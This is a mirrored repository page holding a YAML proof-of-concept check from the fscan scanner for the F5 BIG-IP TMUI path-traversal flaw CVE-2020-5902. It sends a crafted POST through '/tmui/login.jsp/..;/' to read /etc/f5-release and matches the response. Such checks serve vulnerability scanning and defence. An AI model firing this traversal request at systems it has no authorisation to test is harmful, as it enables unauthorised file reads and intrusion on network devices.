qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml

17 lines
524 B
YAML
Raw Blame History

name: poc-yaml-f5-tmui-cve-2020-5902-rce
rules:
- method: POST
path: >-
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp
headers:
Content-Type: application/x-www-form-urlencoded
body: fileName=%2Fetc%2Ff5-release
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(b"BIG-IP release")
detail:
author: Jing Ling
links:
- https://support.f5.com/csp/article/K52145254
- https://github.com/rapid7/metasploit-framework/pull/13807/files
Reference in New Issue View Git Blame Copy Permalink